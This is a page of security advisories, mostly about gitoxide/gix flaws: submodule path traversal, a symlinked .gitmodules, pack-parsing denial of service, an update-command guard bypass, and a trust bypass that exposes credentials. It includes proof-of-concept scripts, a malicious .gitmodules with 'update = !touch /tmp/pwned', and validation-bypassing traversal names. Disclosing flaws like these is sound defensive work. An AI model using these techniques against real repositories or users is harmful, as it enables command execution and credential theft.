## Resources - Vulnerable file in image: `rustfs/src/admin/handlers/service_account.rs` @ `d4ea14c2ba99602314511d5862005f7b871ece37` - Vulnerable file at HEAD: `rustfs/src/admin/handlers/service_account.rs` @ `90e584a` (file unchanged since `0a2411f`) - Incorrect action at line 936: `https://github.com/rustfs/rustfs/blob/d4ea14c2ba99602314511d5862005f7b871ece37/rustfs/src/admin/handlers/service_account.rs#L931-L953` - Correct action at line 658 (`InfoServiceAccount`): `https://github.com/rustfs/rustfs/blob/d4ea14c2ba99602314511d5862005f7b871ece37/rustfs/src/admin/handlers/service_account.rs#L658` - Correct action at line 799 (`InfoAccessKey`): `https://github.com/rustfs/rustfs/blob/d4ea14c2ba99602314511d5862005f7b871ece37/rustfs/src/admin/handlers/service_account.rs#L799` - Correct action at line 1095 (`ListAccessKeysBulk`): `https://github.com/rustfs/rustfs/blob/d4ea14c2ba99602314511d5862005f7b871ece37/rustfs/src/admin/handlers/service_account.rs#L1095` - AdminAction enum: `https://github.com/rustfs/rustfs/blob/d4ea14c2ba99602314511d5862005f7b871ece37/crates/policy/src/policy/action.rs#L457-L464` - UpdateServiceAccount handler (ownership gap): `https://github.com/rustfs/rustfs/blob/d4ea14c2ba99602314511d5862005f7b871ece37/rustfs/src/admin/handlers/service_account.rs#L489-L614` - IamCache::update_service_account: `https://github.com/rustfs/rustfs/blob/d4ea14c2ba99602314511d5862005f7b871ece37/crates/iam/src/manager.rs#L663` - Admin statements skip resource matching: `https://github.com/rustfs/rustfs/blob/d4ea14c2ba99602314511d5862005f7b871ece37/crates/policy/src/policy/statement.rs#L132` - rustfs security policy: `https://github.com/rustfs/rustfs/security/policy` - Prior art (same class, different handler): `CVE-2026-22042` / `GHSA-vcwh-pff9-64cc` Koda Reef

Affected versions

All versions < alpha.98

CVSS Vector

CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P

High
📦 gitoxide 📌 All versions < 0.52.1 ⛓️‍💥 Supply-chain attack 🦀 Rust library crates.io 🎯 Remote ⚪ Not exploited 🟢 Patched
💬 ## **Summary** attachments: [pocs.zip](https://github.com/user-attachments/files/26431422/pocs.zip) Submodule names coming from `.gitmodules` are exposed as unvalidated names and are later reused to derive the submodule git directory as: ``` <superproject common_dir>/modules/<s...
📅 2026-05-05 OSV/crates.io 🔗 Details

Full description

## **Summary** attachments: [pocs.zip](https://github.com/user-attachments/files/26431422/pocs.zip) Submodule names coming from `.gitmodules` are exposed as unvalidated names and are later reused to derive the submodule git directory as: ``` <superproject common_dir>/modules/<submodule name> ``` Because the submodule name is joined directly as a filesystem path component, a name such as `../../../escaped-target.git` escapes `.git/modules` after normalization. The current implementation then uses that escaped path in both `state()` and `open()`. The updated PoC demonstrates the real sink, not just string construction: - `state()` reports `repository_exists=true` for the traversed path; - `open()` returns a repository whose normalized `common_dir()` matches the attacker-chosen repository outside `.git/modules`. ## **Root cause analysis** The relevant flow is: 1. [`gix-submodule/src/access.rs`](https://github.com/GitoxideLabs/gitoxide/blob/v0.52.0/gix-submodule/src/access.rs) exposes unvalidated submodule names from configuration. 2. [`gix/src/submodule/mod.rs`](https://github.com/GitoxideLabs/gitoxide/blob/v0.52.0/gix/src/submodule/mod.rs) derives the git directory by doing `common_dir().join("modules").join(name)` with no confinement check. 3. [`gix/src/submodule/mod.rs`](https://github.com/GitoxideLabs/gitoxide/blob/v0.52.0/gix/src/submodule/mod.rs) uses that derived path during state resolution and repository opening. There is no normalization-and-confinement step between “submodule name from configuration” and “filesystem path used for repository existence checks / open.” As a result, traversal segments in the submodule name directly influence which repository path is inspected and opened. ## **Reproduction steps** Use the attached PoC zip that contains the `pocs/` workspace. 1. Unzip the PoC archive. 2. Enter `pocs/F002`. 3. Run: ``` cargo run --quiet ``` 4. 
Key outputs are: - `submodule_name=../../../escaped-target.git` - `derived_git_dir_raw=.../.git/modules/../../../escaped-target.git` - `derived_git_dir_normalized=.../artifacts/escaped-target.git` - `escaped_target=.../artifacts/escaped-target.git` - `repository_exists=true` - `submodule_opened=true` - `opened_common_dir_normalized=.../artifacts/escaped-target.git` - `normalized_git_dir_matches_target=true` - `opened_common_dir_matches_target=true` - `target_outside_modules_root=true` These outputs show that gitoxide is not only constructing a traversable path string. It is actually using the escaped path for repository existence checks and for opening a repository object. ## **Impact** Confirmed impact: - a malicious submodule name can redirect submodule state inspection away from `.git/modules/<name>` to an attacker-chosen repository path outside `.git/modules`; - `Submodule::state()` can report repository existence for the wrong repository; - `Submodule::open()` can return a repository object backed by that attacker-chosen path. This is best described as a path-traversal / repository-confusion issue in submodule repository resolution. This report does **not** claim command execution from this behavior alone. The demonstrated impact is repository redirection: callers that enumerate, inspect, or operate on submodules can be steered into using the wrong repository. ## **Recommended fix** Two complementary fixes are advisable: 1. do not reuse raw submodule names as filesystem path fragments; - either use a validated/sanitized name for filesystem derivation, - or derive the storage path from a safe identifier instead of the user-controlled name; 2. add an explicit confinement check after path derivation; - normalize or canonicalize the candidate path, - verify that the result stays under `<common_dir>/modules`, - reject names that contain traversal segments, path separators, or any representation that can escape the modules root. 
In short, submodule names may remain opaque configuration identifiers, but they should not be treated as trusted filesystem subpaths.
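The two recommended fixes can be combined into one lexical normalize-and-confine step. The following std-only sketch (under the report's layout assumptions; `modules_git_dir` is an illustrative helper, not gitoxide's API) rejects any submodule name whose normalized path leaves the modules root:

```rust
use std::path::{Component, Path, PathBuf};

// Lexically normalize `<modules_root>/<name>` and confirm the result stays
// strictly inside the modules root; reject traversal otherwise.
fn modules_git_dir(modules_root: &Path, name: &str) -> Result<PathBuf, String> {
    let candidate = modules_root.join(name);
    let mut normalized = PathBuf::new();
    for comp in candidate.components() {
        match comp {
            Component::ParentDir => {
                // Popping past an empty path means the name escaped entirely.
                if !normalized.pop() {
                    return Err(format!("name {name:?} escapes the modules root"));
                }
            }
            Component::CurDir => {}
            other => normalized.push(other),
        }
    }
    // The name must resolve to a proper descendant of `<modules_root>`.
    if normalized.starts_with(modules_root) && normalized != modules_root {
        Ok(normalized)
    } else {
        Err(format!("name {name:?} escapes the modules root"))
    }
}
```

Note this is a lexical check; a hardened implementation would additionally canonicalize (to defeat symlinked intermediate directories) and reject backslashes as separators on all platforms.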

Affected versions

All versions < 0.52.1

CVSS Vector

CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:P

High
📦 gitoxide 📌 All versions < 0.52.1 ⛓️‍💥 Supply-chain attack 🦀 Rust library crates.io 🎯 Remote ⚪ Not exploited 🟢 Patched
💬 ## Summary attachments: [pocs.zip](https://github.com/user-attachments/files/26431422/pocs.zip) When `Repository::submodules()` loads submodule metadata, it prefers the worktree `.gitmodules` file if that path exists. In the current implementation, the path is read with `std::f...
📅 2026-05-05 OSV/crates.io 🔗 Details

Full description

## Summary attachments: [pocs.zip](https://github.com/user-attachments/files/26431422/pocs.zip) When `Repository::submodules()` loads submodule metadata, it prefers the worktree `.gitmodules` file if that path exists. In the current implementation, the path is read with `std::fs::read()`, which follows symlinks. As a result, a repository can present a symlinked `.gitmodules` that points outside the repository, and gitoxide will parse the out-of-repository bytes as submodule configuration. This is a repository-boundary violation. A caller using the high-level submodule API can believe it is reading repository-local submodule metadata, while the bytes are actually coming from an arbitrary file outside the repository tree. ## Root cause analysis The relevant flow is: 1. [`gix/src/repository/location.rs`](https://github.com/GitoxideLabs/gitoxide/blob/v0.52.0/gix/src/repository/location.rs) derives the worktree `.gitmodules` path as `workdir/.gitmodules`. 2. [`gix/src/repository/submodule.rs`](https://github.com/GitoxideLabs/gitoxide/blob/v0.52.0/gix/src/repository/submodule.rs) reads that path with `std::fs::read(&path)` and immediately parses the bytes as a submodule configuration file. 3. `Repository::submodules()` exposes the parsed entries through the high-level API. The issue is not in the parser. The issue is that the worktree path is treated as an ordinary file without checking whether it is a symlink, and without checking whether the canonicalized target remains inside the repository worktree. Because `std::fs::read()` follows symlinks, a malicious repository can cause gitoxide to ingest bytes from an attacker-chosen location outside the repository. The resulting `Submodule` objects then expose `name`, `path`, and `url` values derived from that external file. ## Reproduction steps Use the attached PoC zip that contains the `pocs/` workspace. 1. Unzip the PoC archive. 2. Enter `pocs/F001`. 3. Run: ```bash cargo run --quiet ``` 4. 
Compare the output with `pocs/F001/result.txt`. Important outputs include: - `gitmodules_symlink=.../victim-repo/.gitmodules` - `symlink_target=.../outside/modules.conf` - `parsed_name=symlinked` - `parsed_path=deps/symlinked` - `parsed_url=https://attacker.example/symlinked.git` These outputs show that gitoxide parsed the submodule configuration from the symlink target outside the repository, not from repository-local bytes. ## Impact Confirmed impact: - out-of-repository bytes can be injected into the result of `Repository::submodules()`; - callers can be misled about submodule metadata such as `name`, `path`, and `url`; - any downstream workflow that uses those values to decide clone, fetch, update, or policy behavior is operating on attacker-controlled data that did not actually originate from the repository tree. This report does **not** claim direct command execution from this code path by itself. The demonstrated impact is metadata injection across the repository boundary. ## Recommended fix A safe fix is to stop silently following symlinks for the worktree `.gitmodules` path in this loading path. Reasonable options include: 1. use `symlink_metadata()` / `lstat`-style checks and reject symlinked `.gitmodules` when loading from the worktree; 2. canonicalize the target and verify that it still resides under the repository worktree before reading it; 3. for security-sensitive callers, prefer loading `.gitmodules` from the index or `HEAD` tree rather than following the worktree path. At minimum, the worktree path should not silently follow symlinks to arbitrary external files.
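Option 1 above can be sketched with only the standard library: `fs::symlink_metadata` is the `lstat` analogue that does not follow links, unlike `fs::metadata` and `fs::read`. The function name here is illustrative, not gitoxide's API:

```rust
use std::fs;
use std::io;
use std::path::Path;

// Read the worktree `.gitmodules` only if the path itself is not a symlink;
// otherwise fail instead of silently ingesting out-of-repository bytes.
fn read_gitmodules_no_follow(path: &Path) -> io::Result<Vec<u8>> {
    let meta = fs::symlink_metadata(path)?; // lstat: does not follow links
    if meta.file_type().is_symlink() {
        return Err(io::Error::new(
            io::ErrorKind::InvalidData,
            "refusing to follow a symlinked .gitmodules",
        ));
    }
    fs::read(path)
}
```

A TOCTOU-free variant would open the file with `O_NOFOLLOW` on platforms that support it; the check above is the minimal portable form of the idea.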

Affected versions

All versions < 0.52.1

CVSS Vector

CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:P

High
📦 gix-pack 📌 All versions < 0.69.0 ⛓️‍💥 Supply-chain attack 🦀 Rust library crates.io 🎯 Remote ⚪ Not exploited 🟢 Patched
💬 ### Summary Multiple denial-of-service vectors in `gix-pack`: unchecked array indexing causes panics on crafted delta data, and uncapped attacker-controlled size headers enable OOM process kills. Both are triggered by malicious pack data received during clone/fetch. ### Details...
📅 2026-05-05 OSV/crates.io 🔗 Details

Full description

### Summary Multiple denial-of-service vectors in `gix-pack`: unchecked array indexing causes panics on crafted delta data, and uncapped attacker-controlled size headers enable OOM process kills. Both are triggered by malicious pack data received during clone/fetch. ### Details **Bug 1: Unchecked array indexing in delta application (CWE-248)** The `apply()` function in `gix-pack/src/data/delta.rs` (lines 33-87) reads delta instructions using unchecked `data[i]` indexing at 7 locations (lines 41, 45, 49, 53, 57, 61, 65). The command byte's bits indicate how many additional bytes follow, but if the delta data is truncated, the index panics: ```rust pub(crate) fn apply(base: &[u8], mut target: &mut [u8], data: &[u8]) -> Result<(), apply::Error> { let mut i = 0; while let Some(cmd) = data.get(i) { // first byte: safely checked i += 1; match cmd { cmd if cmd & 0b1000_0000 != 0 => { let (mut ofs, mut size): (u32, u32) = (0, 0); if cmd & 0b0000_0001 != 0 { ofs = u32::from(data[i]); // PANIC: no bounds check i += 1; } // ... 6 more unchecked data[i] at lines 45, 49, 53, 57, 61, 65 ``` Lines 83-84 use `assert_eq!` (not `debug_assert_eq!`) that panics in both debug and release builds: ```rust assert_eq!(i, data.len()); assert_eq!(target.len(), 0); ``` A second location in `parse_header_info()` (`gix-pack/src/data/entry/decode.rs:116-129`) also panics on truncated input via unchecked `data[0]` and `data[i]`. Note: PR #2059 (merged 2025-06-25) fixed the explicit `panic!()` for command code 0. The unchecked array indexing is a distinct class that remains unfixed. **Bug 2: Uncapped allocation from attacker-controlled size headers (CWE-770)** Pack entry headers and delta headers encode object sizes as LEB128-encoded u64 values. 
These sizes are used to allocate buffers before validating the actual data, with no upper bound: ``` bytes_to_entries.rs:109 Vec::with_capacity(entry.decompressed_size as usize) // UNCAPPED resolve.rs:461 out.resize(decompressed_len, 0) // UNCAPPED resolve.rs:190 fully_resolved_delta_bytes.resize(result_size as usize, 0) // UNCAPPED ``` A 10-byte crafted pack entry can claim `decompressed_size = 0xFFFFFFFFFFFF` (281 TB). At `bytes_to_entries.rs:109`, gitoxide calls `Vec::with_capacity(281TB)` **before any decompression occurs**. The OS immediately OOM-kills the process. No `MAX_SIZE`, `max_object_size`, or equivalent limit exists anywhere in gix-pack. The allocation at `resolve.rs:461` is equally dangerous: `decompressed_size` from the pack header is cast to `usize` and passed to `Vec::resize()`, which allocates and zeroes the full claimed size before the zlib decompressor runs. ### PoC Compiled and executed in Rust 1.94.1 `--release` mode. All 5 panics confirmed: ``` [1] delta apply: cmd=0x81, truncated -> PANIC: index out of bounds: len is 1 but index is 1 [2] delta apply: cmd=0xFF, only 3 extra bytes -> PANIC: index out of bounds: len is 4 but index is 4 [3] parse_header_info: empty data -> PANIC: index out of bounds: len is 0 but index is 0 [4] parse_header_info: byte=0x80, truncated -> PANIC: index out of bounds: len is 1 but index is 1 [5] delta apply: assert_eq!(i, data.len()) -> PANIC: assertion failed ``` For the OOM vector: the allocation path is `parse_header_info()` -> `entry.decompressed_size` (u64) -> `Vec::with_capacity(size as usize)` with no intermediate validation. A minimal pack with a single entry claiming a multi-terabyte size triggers immediate process kill. 
### Impact Any application built on gitoxide that clones or fetches from an untrusted remote can be crashed by a malicious server: - **Panic DoS**: 1-2 bytes of crafted delta data causes an immediate process abort - **OOM DoS**: A single crafted pack entry header causes the process to attempt a multi-terabyte allocation, triggering an immediate OOM kill by the OS This affects the `gix` CLI, any application using the `gix` crate, and CI/CD systems that clone repositories using gitoxide. No fuzz targets exist for gix-pack (issue #703 tracks oss-fuzz integration). ### Suggested fix For panics: replace unchecked `data[i]` with `data.get(i).ok_or(Error::...)` and replace `assert_eq!` with proper error returns. For OOM: add a configurable maximum object size (similar to git's `transfer.maxPackSize`) and validate claimed sizes against it before allocating. At minimum, cap allocations to a reasonable default (e.g., 4 GB) and use `try_reserve()` consistently. ### Severity High. Network vector, no privileges required, user interaction required (clone/fetch). The OOM vector is a single-packet process kill with no recovery.
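The suggested fixes (checked reads returning errors instead of panicking, plus a size cap validated with `try_reserve` before allocation) can be sketched in std-only Rust. All names and the 4 GiB cap are illustrative defaults, not gix-pack's API; `read_size` models the LEB128-style 7-bit little-endian size encoding used by delta headers:

```rust
#[derive(Debug, PartialEq)]
enum DecodeError {
    Truncated,
    SizeOverflow,
    ObjectTooLarge(u64),
    OutOfMemory,
}

const MAX_OBJECT_SIZE: u64 = 4 << 30; // illustrative 4 GiB cap

// Read a varint size: 7 data bits per byte, MSB = continuation.
// Truncated input yields an error, never an out-of-bounds panic.
fn read_size(data: &[u8]) -> Result<(u64, usize), DecodeError> {
    let mut size = 0u64;
    let mut shift = 0u32;
    for (i, &byte) in data.iter().enumerate() {
        if shift >= 64 {
            return Err(DecodeError::SizeOverflow);
        }
        size |= u64::from(byte & 0x7f) << shift;
        if byte & 0x80 == 0 {
            return Ok((size, i + 1));
        }
        shift += 7;
    }
    // Every byte had its continuation bit set: this is exactly the
    // truncated case that makes unchecked `data[i]` panic upstream.
    Err(DecodeError::Truncated)
}

// Validate the claimed size against a cap, then allocate fallibly so a
// hostile header cannot abort or OOM-kill the process.
fn alloc_object_buffer(claimed: u64) -> Result<Vec<u8>, DecodeError> {
    if claimed > MAX_OBJECT_SIZE {
        return Err(DecodeError::ObjectTooLarge(claimed));
    }
    let mut buf = Vec::new();
    buf.try_reserve_exact(claimed as usize)
        .map_err(|_| DecodeError::OutOfMemory)?;
    Ok(buf)
}
```

With this shape, the 281 TB claim from the PoC is rejected by a cheap comparison before any memory is touched, and even sizes under the cap fail gracefully via `try_reserve_exact` rather than aborting.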

Affected versions

All versions < 0.69.0

CVSS Vector

CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N

High
📦 gix 📌 All versions < 0.83.0 ⛓️‍💥 Supply-chain attack 🦀 Rust library crates.io 🎯 Local ⚪ Not exploited 🟢 Patched
💬 ### Summary [`gix_submodule::File::update()`](https://github.com/GitoxideLabs/gitoxide/blob/main/gix-submodule/src/access.rs#L168) is the API that gates whether an attacker-supplied `.gitmodules` file may set `update = !<shell command>`. The function is designed to return `Err(C...
📅 2026-05-05 OSV/crates.io 🔗 Details

Full description

### Summary [`gix_submodule::File::update()`](https://github.com/GitoxideLabs/gitoxide/blob/main/gix-submodule/src/access.rs#L168) is the API that gates whether an attacker-supplied `.gitmodules` file may set `update = !<shell command>`. The function is designed to return `Err(CommandForbiddenInModulesConfiguration)` unless the `!command` value came from a trusted local source (`.git/config`). Git CVE [CVE-2019-19604](https://nvd.nist.gov/vuln/detail/cve-2019-19604) illustrates why this check is necessary. However, the guard is implemented incorrectly: it checks whether any section with the same submodule name exists from a non-`.gitmodules` source; it does not verify that the `update` value came from that section. Once a submodule has been initialized (any workflow that writes `submodule.<name>.url` to `.git/config`), and the attacker subsequently adds `update = !cmd` to `.gitmodules`, the guard passes while the command value falls through to the attacker-controlled file. On an identical repository state, `git submodule update` aborts with `fatal: invalid value for 'submodule.sub.update'`, while `gix::Submodule::update()` returns `Ok(Some(Update::Command("touch /tmp/pwned")))`. The vulnerable code was introduced in https://github.com/GitoxideLabs/gitoxide/commit/6a2e6a436f76c8bbf2487f9967413a51356667a0. ### Details The vulnerable method is `gix_submodule::File::update`: https://github.com/GitoxideLabs/gitoxide/blob/main/gix-submodule/src/access.rs#L168-L193: ```rust pub fn update(&self, name: &BStr) -> Result<Option<Update>, config::update::Error> { let value: Update = match self.config.string(format!("submodule.{name}.update")) { // ^^^^^^^^^^^^^^^^^^ // [A] Reads the value. gix_config::File::string() iterates sections // newest-to-oldest; if the override section lacks `update`, it // falls through to .gitmodules and returns the attacker value. 
// // https://github.com/GitoxideLabs/gitoxide/blob/main/gix-config/src/file/access/raw.rs#L76 Some(v) => v.as_ref().try_into().map_err(|()| config::update::Error::Invalid { submodule: name.to_owned(), actual: v.into_owned(), })?, None => return Ok(None), }; if let Update::Command(cmd) = &value { let ours = self.config.meta(); let has_value_from_foreign_section = self .config .sections_by_name("submodule") .into_iter() .flatten() .any(|s| s.header().subsection_name() == Some(name) && !std::ptr::eq(s.meta(), ours)); // ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ // [B] Checks only that SOME section with this name exists from a // non-.gitmodules source. Does NOT check where [A]'s value // came from. if !has_value_from_foreign_section { return Err(config::update::Error::CommandForbiddenInModulesConfiguration { ... }); } } Ok(Some(value)) } ``` ### PoC `git submodule init` copies `submodule.$name.url` and writes `active = true` into `.git/config` ([`init_submodule()`, builtin/submodule--helper.c:438-517](https://github.com/git/git/blob/v2.53.0/builtin/submodule--helper.c#L438-L517)). It does not unconditionally copy `update`. Since CVE-2019-19604, `git` rejects `.gitmodules` files that contain `update = !cmd` at parse time. However, `init` is a one-time operation - once the `.git/config` section exists, subsequent changes to `.gitmodules` are not re-inited. So, the attack sequence is: 1. Attacker's repo ships a benign `.gitmodules` (no `update` key). 2. Victim clones and runs `git submodule init` -> `.git/config` contains: ```ini [submodule "sub"] active = true url = /tmp/sub-origin ``` 3. Attacker pushes a new commit adding `update = !cmd` to `.gitmodules`. 4. Victim runs `git pull` -> `.gitmodules` now contains: ```ini [submodule "sub"] path = sub url = /tmp/sub-origin update = !touch /tmp/pwned ``` while `.git/config` is unchanged. 
This is the precise state that bypasses gitoxide's guard: - The .git/config entry - even though it contains only url and active - causes [`append_submodule_overrides`](https://github.com/GitoxideLabs/gitoxide/blob/dd5c18d9e526e8de462fa40aa047acd097cfa7dc/gix-submodule/src/lib.rs#L41) to create an override section. That section has foreign (non-.gitmodules) metadata, so the existence check at [B] returns true and the guard is disarmed. - However, because that override section has no update key, the value lookup at [A] skips past it and falls through to the .gitmodules section, returning the attacker's !touch /tmp/pwned. The bug is the mismatch between what [A] and [B] actually inspect: [A] asks "which section provides the update value?" (answer: .gitmodules), while [B] asks "does any trusted section exist for this submodule?" (answer: yes). A correct guard would ask the same question as [A]. Git itself would refuse to operate on this repository at the next `git submodule update`. The vulnerability is in gitoxide-based consumers that call `Submodule::update()` and trust its output. ### Option 1: Unit test (verified - passes, confirming the bug) Drop into `gix-submodule/tests/file/mod.rs` inside `mod update`: ```rust #[test] fn security_bypass_via_partial_override() { use std::str::FromStr; // Attacker-controlled .gitmodules let gitmodules = "[submodule.a]\n url = https://example.com/a\n update = !touch /tmp/pwned"; // Post-`git submodule init` state: only `url` copied to .git/config let repo_config = gix_config::File::from_str("[submodule.a]\n url = https://example.com/a").unwrap(); let module = gix_submodule::File::from_bytes(gitmodules.as_bytes(), None, &repo_config).unwrap(); let result = module.update("a".into()); // VULNERABLE: prints `Ok(Some(Command("touch /tmp/pwned")))` // SECURE: should be `Err(CommandForbiddenInModulesConfiguration { .. 
})` eprintln!("{:?}", result); } ``` ```console $ cargo test -p gix-submodule security_bypass -- --nocapture running 1 test bypass result: Ok(Some(Command("touch /tmp/pwned"))) test file::update::security_bypass_via_partial_override ... ok ``` ### Option 2: End-to-end - git refuses, gitoxide accepts Verified with **git 2.51.2** and **gix @ `dd5c18d9e`**. ```bash #!/bin/bash set -e cd /tmp rm -rf evil-repo victim sub-origin 2>/dev/null || true # --- Setup --- mkdir sub-origin && cd sub-origin git init -q && git commit -q --allow-empty -m init cd /tmp # --- [1] Attacker creates repo with BENIGN submodule --- mkdir evil-repo && cd evil-repo git init -q git -c protocol.file.allow=always submodule add /tmp/sub-origin sub git commit -q -m "add submodule (benign)" cd /tmp # --- [2] Victim clones and inits (passes git's .gitmodules validation) --- git -c protocol.file.allow=always clone -q /tmp/evil-repo victim cd victim git submodule init # .git/config now has: [submodule "sub"] active=true, url=..., NO update key cd /tmp # --- [3] Attacker adds malicious update to .gitmodules --- cd evil-repo cat >> .gitmodules <<'EOF' update = !touch /tmp/pwned EOF git commit -q -am "add malicious update" cd /tmp # --- [4] Victim pulls --- cd victim git pull -q ``` Final state: ``` --- .gitmodules: [submodule "sub"] path = sub url = /tmp/sub-origin update = !touch /tmp/pwned --- .git/config (submodule section): [submodule "sub"] active = true url = /tmp/sub-origin ``` **Upstream git on this state:** ```console $ cd /tmp/victim && git submodule update fatal: invalid value for 'submodule.sub.update' $ echo $? 
128 $ test -f /tmp/pwned && echo VULNERABLE || echo SAFE SAFE ``` **Gitoxide on the same state:** ```rust // /tmp/gix-repro/main.rs let repo = gix::open("/tmp/victim")?; for sm in repo.submodules()?.expect("submodules present") { println!("{}: {:?}", sm.name(), sm.update()); } ``` ```console $ cargo run sub: Ok(Some(Command("touch /tmp/pwned"))) ``` The `CommandForbiddenInModulesConfiguration` guard never fires. ### Impact ### Direct Any downstream code built on `gix` that: 1. Calls `Submodule::update()` to determine the update strategy, and 2. Trusts that `Update::Command(_)` is safe to execute (because `CommandForbiddenInModulesConfiguration` exists as the documented guard) …will execute attacker-controlled shell commands on `submodule update` against a previously-initialized submodule. `gix` itself does not currently ship a `submodule update` implementation, so there is no RCE in the `gix` CLI today. However: - The `Submodule::update()` API is public at `gix/src/submodule/mod.rs:108` and delegates directly to the vulnerable function. - The error variant name (`CommandForbiddenInModulesConfiguration`) and test suite (`valid_in_overrides` at `gix-submodule/tests/file/mod.rs:272`) explicitly document this as the security boundary. - Any third-party tool, IDE plugin, or CI integration building submodule-update on top of `gix` inherits this vulnerability. ### Indirect / second-order - CI/forge integrations that auto-init submodules and then query the update mode - Editor/IDE extensions using `gix` for submodule info - Gitoxide-based `init` equivalents - any tool that implements its own init (writing `url` to local config) creates the bypass state without needing the pull-after-init sequence
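The [A]/[B] mismatch is easy to model with plain std types. This toy sketch (not gix-config's API) reproduces the fall-through value lookup over sections ordered newest-to-oldest, and contrasts the existence-based guard with a provenance-aware one:

```rust
// Each config section is tagged with the file it came from.
#[derive(Clone, Copy, PartialEq, Debug)]
enum Source {
    GitConfig,  // trusted override section from .git/config
    GitModules, // attacker-controlled .gitmodules
}

struct Section {
    source: Source,
    update: Option<&'static str>, // the submodule.<name>.update value, if set
}

// [A] Which section actually provides the `update` value? Scans override
// sections first and falls through, like the newest-to-oldest iteration
// described in the report.
fn lookup_update(sections: &[Section]) -> Option<(Source, &'static str)> {
    sections.iter().find_map(|s| s.update.map(|v| (s.source, v)))
}

// [B] Buggy guard: only asks whether ANY trusted section exists for this
// submodule, regardless of where the value came from.
fn command_allowed_buggy(sections: &[Section]) -> bool {
    sections.iter().any(|s| s.source == Source::GitConfig)
}

// Correct guard: asks the same question as [A], namely where the `update`
// value itself originated.
fn command_allowed_fixed(sections: &[Section]) -> bool {
    matches!(lookup_update(sections), Some((Source::GitConfig, _)))
}
```

In the post-init state from the PoC (a `.git/config` section with only `url`/`active`, and `update = !cmd` only in `.gitmodules`), the buggy guard is disarmed while the value still comes from the untrusted file; the provenance-aware guard blocks it without breaking the legitimate local-override case.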

Affected versions

All versions < 0.83.0

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

High
📦 gix 📌 All versions < 0.83.0 ⛓️‍💥 Supply-chain attack 🦀 Rust library crates.io 🎯 Remote ⚪ Not exploited 🟢 Patched
💬 ### Summary Submodule name validation bypass plus missing validation in production code paths allows path traversal via crafted `.gitmodules`. Combined with a trust inheritance flaw in `Submodule::open()`, this enables reading arbitrary git repository configs (including credenti...
📅 2026-05-05 OSV/crates.io 🔗 Details

Full description

### Summary Submodule name validation bypass plus missing validation in production code paths allows path traversal via crafted `.gitmodules`. Combined with a trust inheritance flaw in `Submodule::open()`, this enables reading arbitrary git repository configs (including credentials) from traversed paths with full trust (CWE-22, CWE-200). ### Details **Bug 1: Validation bypass in `gix-validate/src/submodule.rs` (lines 27-42)** The `name()` function uses `name.find(b"..")` which returns only the FIRST occurrence. If the first `..` is embedded in a non-traversal context, the function returns `Ok` without checking subsequent `../` sequences: ```rust pub fn name(name: &BStr) -> Result<&BStr, name::Error> { match name.find(b"..") { Some(pos) => { let &b = name.get(pos + 2).ok_or(name::Error::ParentComponent)?; if b == b'/' || b == b'\\' { Err(name::Error::ParentComponent) } else { Ok(name) // Returns Ok without checking rest of string } } None => Ok(name), } } ``` Bypass: `a..b/../../../.git/` passes because `find(b"..")` returns position 1 (the `..` in `a..b`), checks `name[3] == b'b'`, and returns Ok. The real `/../../../` is never checked. **Bug 2: Validation never called in production** `gix_validate::submodule::name()` has zero production callers (only test code). The `names()` iterator in `gix-submodule/src/access.rs:29` explicitly documents it returns "unvalidated names." `git_dir()` at `gix/src/submodule/mod.rs:198-204` constructs filesystem paths from raw names: ```rust pub fn git_dir(&self) -> PathBuf { self.state.repo.common_dir().join("modules").join(gix_path::from_bstr(self.name())) } ``` **Bug 3: Trust inheritance bypass in `Submodule::open()`** At `gix/src/submodule/mod.rs:270`, `open()` clones the parent repository's options: ```rust match crate::open_opts(self.git_dir_try_old_form()?, self.state.repo.options.clone()) { ``` The parent's `options.git_dir_trust` is `Some(Trust::Full)`. 
At `gix/src/open/repository.rs:103-104`:

```rust
if options.git_dir_trust.is_none() {
    options.git_dir_trust = gix_sec::Trust::from_path_ownership(&git_dir)?.into();
}
```

Since trust is already `Some(Full)`, the ownership check is **skipped entirely**. The traversed path is opened with `Trust::Full` regardless of ownership, bypassing gitoxide's safe-directory protections.

### PoC

Compiled and executed with Rust 1.94.1 in `--release` mode. All bypass cases confirmed:

```
BYPASS a..b/../../../.git/ -> PASSED validation
  git_dir    = .git/modules/a..b/../../../.git/
  normalized = .git/ (parent repo!)
BYPASS x..y/../../../.git/config -> PASSED validation
  git_dir    = .git/modules/x..y/../../../.git/config
  normalized = .git/config
```

### Attack chain

1. The attacker crafts a repository with a `.gitmodules` such as:

   ```ini
   [submodule "x..y/../../.."]
       path = innocent
       url = https://attacker.com/repo.git
   ```

2. The victim clones the repository using a tool built on gitoxide.
3. When the tool iterates submodules and calls `submodule.open()` or `submodule.status()`:
   - `git_dir()` returns `.git/modules/x..y/../../..`, which resolves to the parent `.git/`
   - `open_opts()` is called with `Trust::Full` (inherited from the parent; the ownership check is skipped)
   - The parent's `.git/config` is fully parsed
4. The returned `Repository` object exposes all config values from the traversed path:
   - `remote.origin.url` (may contain `https://user:token@github.com/...`)
   - `http.extraHeader` (often `Authorization: Bearer <token>`)
   - `credential.*` sections
   - `core.sshCommand`
5. These are accessible via the standard API: `repo.config_snapshot().string("http.extraHeader")`, `repo.find_remote("origin")`, etc.

### Impact

A crafted `.gitmodules` in a malicious repository causes gitoxide to open arbitrary git directories as submodule repositories with full trust, exposing their configuration including credentials.
This is the same class of vulnerability as GHSA-7w47-3wg8-547c (path traversal), but through the submodule-name vector with an additional trust bypass. The trust inheritance is the critical amplifier: without it, the traversed path would undergo ownership checks that could block the attack; with it, any git directory reachable via `../` is opened with full trust.

### Honest limitations

- The traversed path must be a valid git directory (`HEAD`, `objects/`, and `refs/` must exist)
- The victim's tool must call `open()` or `status()` on submodules (tools that only list submodules are not affected)
- Credential exposure requires the target config to contain embedded credentials
- Submodule operations currently require explicit user action

### Suggested fix

1. Fix the validation to check ALL `..` occurrences (iterate, rather than a single `find`)
